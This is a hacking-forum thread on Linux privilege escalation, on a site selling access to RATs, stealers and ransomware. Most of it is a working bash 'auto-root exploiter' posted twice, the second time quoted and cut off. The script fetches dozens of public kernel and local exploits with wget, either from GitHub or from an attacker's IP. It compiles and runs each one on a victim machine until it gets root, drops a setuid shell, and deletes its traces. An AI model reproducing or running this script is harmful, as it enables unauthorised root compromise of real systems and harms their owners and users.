Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

 

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      D4rkn3S

      linux privilege escalation commands

      Recommended Posts

      hello guys, there is commands and cheat sheet which need at privilege escalation phase

       

      Hidden Content

        Give reaction to this post to see the hidden content.

      Share this post


      Link to post
      Share on other sites

      i am really looking for these command hope u are going to proivide private commands 

      Share this post


      Link to post
      Share on other sites

      Windows

      Hidden Content

        Give reaction to this post to see the hidden content.

      Linux

      Hidden Content

        Give reaction to this post to see the hidden content.

      Share this post


      Link to post
      Share on other sites
      23 hours ago, bash818 said:

      Windows

      Hidden Content

        Give reaction to this post to see the hidden content.

      Linux

      Hidden Content

        Give reaction to this post to see the hidden content.

      nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

       

      Spoiler

      #!/bin/bash

      bold=`tput bold`
      normal=`tput sgr0`
      red='\e[0;31m'
      yellow='\e[1;33m'
      blue='\e[1;34m'
      light_green='\e[1;32m'
      light_cyan='\e[1;36m'
      cyan='\e[0;36m'
      red='\e[0;31m'
      light_red='\e[1;31m'
      brown='\e[0;33m'
      no_color='\e[0m'

      #com_url='$gaddress/linux/local'
      #x86_64_url='$gaddress/lin_x86-64/local'
      #x86_url='$gaddress/lin_x86/local'
      #sploits_url='$saddress/sploits'

      function lauto_root(){

          echo -e "\n${light_green}${bold}###################################################"
          echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
          echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
          echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
          echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
          echo -e "${light_green}${bold}###################################################"
      }    

      function desc(){

          echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
          echo -e "${light_red}${bold}Options: ${no_color}\n"
          echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
          echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
          echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
          echo -e "${bold}${light_red}Command Examples: \n"
          echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
          echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
          echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
      }

      function local_dir(){

          sudo rm -r /var/www/html/exploits
          # Creating the required Directories
          sudo mkdir /var/www/html/exploits
          sudo mkdir /var/www/html/exploits/gitex
          sudo mkdir /var/www/html/exploits/linux
          sudo mkdir /var/www/html/exploits/linux/local
          sudo mkdir /var/www/html/exploits/linux_x86-64
          sudo mkdir /var/www/html/exploits/linux_x86-64/local
          sudo mkdir /var/www/html/exploits/linux_x86
          sudo mkdir /var/www/html/exploits/linux_x86/local
          sudo mkdir /var/www/html/exploits/sploits
      }

      function arsenal(){

          # Getting the common exploits to local directory
          cd /var/www/html/exploits/linux/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
          sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
          sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
          sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
          sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
          sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
          sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
          sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
          sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
          sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
          sudo wget --no-check-certificate $gaddress/linux/local/718.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
          sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39230.c
          sudo wget --no-check-certificate $gaddress/linux/local/42183.c

          #bash exploits
          sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

          #python exploits
          sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
          sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

          # Getting 64bit only exploits to lin_x86-64 directory
          cd /var/www/html/exploits/lin_x86-64/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

          # Getting 32-bit only exploit to lin_x86 directory
          cd /var/www/html/exploits/lin_x86/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

          # Getting the compressed exploits to sploits directory
          cd /var/www/html/exploits/sploits

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
          sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

          # Getting CVE-2016-2384 exploit to gitex directory 
          cd /var/www/html/exploits/gitex

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gitaddress/poc.c
          sudo wget --no-check-certificate $gitaddress/poc.py
      }

      function valid_ip()
      {
          if ! [ "$2" ]; then
              echo -e "${red}${bold}IP Not Provided, Please provide an IP"
          else
              if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

                  for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
                  do
                    (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
                  done
              else
                  echo -e "${light_green}========================================"
                  echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
                  echo -e "========================================"
                  exit 1;
              fi
          fi
      }

      #gaddress=$1'/exploits'
      #saddress=$1'/exploits'
      #gitaddress=$1'/exploits/gitex'
      function exploiter(){

          checkroot() {
              if [ $(id -u) == 0 ]; then
              echo
              echo -e "${light_red}Successfully R00T(ed).. have fun :)"
              id=$(id)
              echo -e "${light_red}ID     => ${light_green}" $id
              who=$(whoami)
              echo -e "${light_red}WHOAMI => ${light_green}" $who
              exit
              else
              echo ""
              echo -e "${light_red}R00Ting.. ${light_green}"
              sleep 1
              fi
          }
          ccmpl(){
              gcc exploit.c -o exploit -lutil -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -m32 -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lkeyutils -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -pthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -static -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -fPIC -shared -o exploit exploit.c -ldl -w
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -O2 exploit.c
              gcc -O2 -fomit-frame-pointer exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c -static -O2
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -pthread exploit.c -o exploit -lcrypt
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -m64 -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
          }
          shcmpl(){
              bash exploit.sh
              rm exploit.sh
              rm *.c
              checkroot;
          }
          pycmpl(){
              python exploit.py
              rm exploit.py
              rm *.c
              checkroot;
          }
          echo -e "${light_red}Auto R00Ting started...${light_green}"

          checkroot;
          #c
          wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
          ccmpl;

          #sh
          wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
          shcmpl;

          #py
          wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
          pycmpl;
          wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
          pycmpl;

          #txt
          #platforms/linux/local/9191.txt
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/39772.txt
          wget --no-check-certificate $saddress/bin-sploits/39772.zip
          cd 39772
          unzip 39772.zip
          tar -xf exploit.tar
          cd ebpf_mapfd_doubleput_exploit
          bash compile.sh
          ./hello
          ./doubleput
          ./suidhelper
          cd ..
          rm -rf ebpf_mapfd_doubleput_exploit
          rm -rf exploit.tar
          checkroot;
          tar -xf crasher.tar
          cd ebpf_mapfd_doubleput_crasher
          bash compile.sh
          ./doubleput
          cd ..
          rm -rf ebpf_mapfd_doubleput_crasher
          rm -rf 39772
          rm -rf 39772.zip
          checkroot;
          #platforms/linux/local/23674.txt
          smbmount --version
          ls -l /usr/bin/smbmount
          ls -l /usr/bin/smbmnt
          echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
          make a
          cc a.c -o a
          chmod +s a
          share:/etc/samba/smb.conf
          /etc/samba/smb.conf
          [share]
          path = /data/share
          writable = no
          locking = no
          public = yes
          guest ok = yes
          comment = Share
          ls -l a
          ls -l pokus/a
          id
          checkroot;
          #platforms/linux/local/29714.txt
          wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          tar -zxf 29714.tgz
          cd exploit
          make
          make install
          cd ..
          rm -rf exploit
          rm -rf 29714.tgz
          checkroot;
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/33395.txt
          wget $saddress/bin-sploits/33395.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          checkroot;
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          #platforms/linux/local/40489.txt
          wget --no-check-certificate $saddress/bin-sploits/40489.zip
          unzip 40489.zip
          cd 40489
          bash compile.sh
          ./pwn
          ./enjoy
          cd ..
          rm -rf 40489
          rm -rf 40489.zip
          checkroot;
          #platforms/linux/local/41770.txt
          # #!/bin/bash
          # (./ProcReadHelper /proc/$$/syscall) &
          # sleep 1
          # exec /usr/bin/passwd
          # #!/bin/bash
          # echo "Current pid is $$"
          # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
          # sleep 5
          # exec /usr/bin/passwd
          # static ssize_t mem_read(struct file * file, char __user * buf,
          #                         size_t count, loff_t *ppos) {
          #     if (file->private_data != (void*)((long)current->self_exec_id))
          #         goto out_put;
          # #!/bin/bash
          # (sleep 3; echo 15) > /proc/$$/oom_adj &
          # exec /usr/bin/passwd
          # checkroot;
          #platforms/linux/local/38559.txt
          rmmod b43
          modprobe b43 fwpostfix=AA%xBB
          dmesg
          checkroot;
          #platforms/linux/local/41999.txt
          wget --no-check-certificate $gitaddress/poc.c -O poc.c
          gcc poc.c -masm=intel
          ./a.out 0
          checkroot;
          ./a.out 1
          checkroot;
          ./a.out 2
          checkroot;
          ./a.out 3
          checkroot;
          ./a.out 4
          checkroot;
          ./a.out 5
          checkroot;
          ./a.out 6
          checkroot;
          ./a.out 7
          checkroot;
          ./a.out 8
          checkroot;
          ./a.out 9
          checkroot;
          ./a.out 10
          checkroot;
          rm a.out
          rm poc.c
          wget --no-check-certificate $gitaddress/poc.py -O poc.py
          python poc.py
          checkroot;
          rm poc.py
          rm a.out
          rm exploit
          
          echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
          exit 1;
      }


      if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
          lauto_root
          desc
      fi

      if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
          lauto_root
          sleep 2 
          echo -e "\n${light_green}=================================="
          echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
          echo -e "==================================\n"
          # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
          local_dir
          arsenal
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
          echo -e "==========================\n"
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
          echo -e "==========================\n"
          /bin/bash -i /etc/init.d/apache2 start
          /bin/bash -i /etc/init.d/apache2 status
          echo -e "${light_green}=================================="
          echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
          echo -e "==================================\n"

          exit 1;
      fi 

      if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
          lauto_root
          if ! [ "$2" ]; then
              echo -e "\n${light_red}No IP address provided!!!\n"
              exit 1;
          else     
              ip=$2
          fi

          if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

              for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
              do
                (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
              done
          else
              echo -e "${light_green}========================================"
              echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
              echo -e "========================================\n"
          fi    

          sleep 2 
          echo -e "${light_green}=================================="
          echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
          echo -e "==================================\n"
          gaddress='http://'${ip}'/exploits'
          saddress='http://'${ip}'/exploits'
          gitaddress='http://'${ip}'/exploits/gitex'
          exploiter
          exit 1;
      fi

      if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
          lauto_root
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          sleep 2 
          echo -e "${light_green}==================================="
          echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
          echo -e "===================================\n"
          exploiter
          exit 1;
      fi


       

      thanks for share

      Share this post


      Link to post
      Share on other sites
      hace 8 horas, D4rkn3S dijo:

      nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

       

        Reveal hidden contents

      #!/bin/bash

      bold=`tput bold`
      normal=`tput sgr0`
      red='\e[0;31m'
      yellow='\e[1;33m'
      blue='\e[1;34m'
      light_green='\e[1;32m'
      light_cyan='\e[1;36m'
      cyan='\e[0;36m'
      red='\e[0;31m'
      light_red='\e[1;31m'
      brown='\e[0;33m'
      no_color='\e[0m'

      #com_url='$gaddress/linux/local'
      #x86_64_url='$gaddress/lin_x86-64/local'
      #x86_url='$gaddress/lin_x86/local'
      #sploits_url='$saddress/sploits'

      function lauto_root(){

          echo -e "\n${light_green}${bold}###################################################"
          echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
          echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
          echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
          echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
          echo -e "${light_green}${bold}###################################################"
      }    

      function desc(){

          echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
          echo -e "${light_red}${bold}Options: ${no_color}\n"
          echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
          echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
          echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
          echo -e "${bold}${light_red}Command Examples: \n"
          echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
          echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
          echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
      }

      function local_dir(){

          sudo rm -r /var/www/html/exploits
          # Creating the required Directories
          sudo mkdir /var/www/html/exploits
          sudo mkdir /var/www/html/exploits/gitex
          sudo mkdir /var/www/html/exploits/linux
          sudo mkdir /var/www/html/exploits/linux/local
          sudo mkdir /var/www/html/exploits/linux_x86-64
          sudo mkdir /var/www/html/exploits/linux_x86-64/local
          sudo mkdir /var/www/html/exploits/linux_x86
          sudo mkdir /var/www/html/exploits/linux_x86/local
          sudo mkdir /var/www/html/exploits/sploits
      }

      function arsenal(){

          # Getting the common exploits to local directory
          cd /var/www/html/exploits/linux/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
          sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
          sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
          sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
          sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
          sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
          sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
          sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
          sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
          sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
          sudo wget --no-check-certificate $gaddress/linux/local/718.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
          sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39230.c
          sudo wget --no-check-certificate $gaddress/linux/local/42183.c

          #bash exploits
          sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

          #python exploits
          sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
          sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

          # Getting 64bit only exploits to lin_x86-64 directory
          cd /var/www/html/exploits/lin_x86-64/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
